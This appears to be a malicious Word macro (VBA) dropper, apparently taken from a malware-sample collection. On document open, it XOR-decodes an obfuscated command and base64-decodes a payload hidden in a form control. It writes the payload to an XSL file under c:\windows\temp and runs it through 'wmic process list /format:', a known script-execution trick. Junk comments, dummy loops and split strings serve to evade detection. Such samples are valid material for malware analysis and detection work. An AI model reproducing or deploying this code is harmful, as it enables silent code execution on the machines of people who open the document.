Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub Document_Open()
Call main
End Sub
Attribute VB_Name = "a0BmY"
Attribute VB_Base = "0{58D27C1C-35BA-43DB-A1FB-DE89A57ACFCC}{25586EA3-C4D5-4CE0-B48B-2AF9B52A10A9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "aM6Eq"
Function akzT1C(agnWGz As String)
Dim axXj4 As Long
axXj4 = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
' Buffalo inst. burglar pascal

Dim aQEeuw As Long
Dim aqgDtI As Document
Set aqgDtI = ActiveDocument
aQEeuw = aqgDtI.ActiveWindow.Panes(1).Pages.Count
Set a6QOgw = New MSXML2.DOMDocument
Dim a54SKl As Integer
a54SKl = 30152 * 1
' Syphilis junior fife roads pander entrepreneurs
Set a4yNa = a6QOgw.createElement("b64")
a4yNa.DataType = "bin.base64"

Dim ac7NMp As Long
ac7NMp = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Footpath pitchfork trousseau residential processor bin
a4yNa.Text = agnWGz
akzT1C = StrConv(a4yNa.nodeTypedValue, vbUnicode)
ayWSj = Not (ayWSj)
' Pervert burner
End Function
Attribute VB_Name = "aZqD1"
Function aXa0hp(aR8J6g, aQ7Y2X)
aXa0hp = aR8J6g Xor aQ7Y2X
End Function
Public Sub aA4RUa(audelR)
alViw = Not (alViw)
Dim a7WbO
For a7WbO = 1 To 46
Debug.Print Error(a7WbO)
Next a7WbO
' Perpetrator mechanisms twenty-ninth franchise commands
Set abB08I = CreateObject("Scripting.FileSystemObject")
Dim aUjhC As Long
aUjhC = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
If aUfDr = False Then
aUfDr = True
Else
aUfDr = False
End If
' Authoritative
Set atTMyG = abB08I.CreateTextFile(aCIBn & aPcbj & aYmGBF & "p" & "\" & "\aNGhsE.xsl", 1)
If azxwR = False Then
azxwR = True
Else
azxwR = False
End If
' Cowboy thessaly mickle
atTMyG.Write audelR
atTMyG.Close
End Sub
Sub asHDv(a6IYO)
If aF6kj3 = False Then
aF6kj3 = True
Else
aF6kj3 = False
End If
' Overhear european inform
If ab72s = False Then
ab72s = True
Else
ab72s = False
End If
' Extensions households prisoner
Dim aYnKgR As Long
aYnKgR = 31332 / 3
' Ursula ground
Call Interaction.Shell@(a6IYO, 2)
a2JOC = Not (a2JOC)

End Sub
Attribute VB_Name = "af8CF"
Function aROat()
aROat = Array(247, 237, 233, 227, 160, 240, 242, 239, 227, 229, 243, 243, 160, 236, 233, 243, 244, 160, 175, 230, 239, 242, 237, 225, 244, 186, 162, 227, 186, 220, 247, 233, 238, 228, 239, 247, 243, 220, 244, 229, 237, 240, 220, 225, 206, 199, 232, 243, 197, 174, 248, 243, 236, 162)
End Function
Function atnBh()
atnBh = a0BmY.x.Text
End Function
Sub main()

Dim aqshJ As Long
aqshJ = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Right-hand mace exhibits
Dim a2Sjv As Long
Dim aJa0E As Document
Set aJa0E = ActiveDocument
a2Sjv = aJa0E.ActiveWindow.Panes(1).Pages.Count
Dim atxEB4 As String
Dim akpU3h
For akpU3h = 29 To 46
Debug.Print Error(akpU3h)
Next akpU3h
' Utilization spleen than bound
axysIq = 17024 / 133
Dim aAW9dQ
For aAW9dQ = 28 To 48
Debug.Print Error(aAW9dQ)
Next aAW9dQ
' Analyse honolulu prospect
atxEB4 = aPoaV(aROat, axysIq)
a0Dm8p = Not (a0Dm8p)
Dim a6thx
Dim ahkg2 As Long
a6thx = 121
ahkg2 = 15
aCh70M = a6thx / ahkg2
' Quagmire
Dim aaLOTv As String
If abro0 = False Then
abro0 = True
Else
abro0 = False
End If
' Uno prologue institute humped cholesterol ensuring festal exotic
Dim abxtZh As Long
abxtZh = ActiveDocument.BuiltinDocumentProperties(wdPropertyPages)
aaLOTv = akzT1C(atnBh())
aA4RUa aaLOTv
Call asHDv(atxEB4)

If arVi8 = False Then
arVi8 = True
Else
arVi8 = False
End If
' Anthology approximate

End Sub
Attribute VB_Name = "agDGu"
Public Const aCIBn As String = "c:\\w"
Public Const aPcbj As String = "indow"
Public Const aYmGBF As String = "s\\tem"
Function aAQfVO(aBNX1)
aAQfVO = UBound(aBNX1)
End Function
Function aPoaV(aBNX1, aUJLZ)

Dim aSxAOT As Long
aSxAOT = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
' Tiring
alEO9 = ""
a6jFd = Not (a6jFd)
For a2EaT = 0 To aAQfVO(aBNX1)
Dim ayjBC
For ayjBC = 29 To 41
Debug.Print Error(ayjBC)
Next ayjBC
akoMU = aXa0hp(aBNX1(a2EaT), aUJLZ)
alEO9 = alEO9 & Chr(akoMU)
Next

Dim aFrf95 As Long
aFrf95 = ActiveDocument.ActiveWindow.Panes(1).Pages.Count
aPoaV = alEO9
End Function
Attribute VB_Name = "akuRnm"


INQUEST-PP=macro
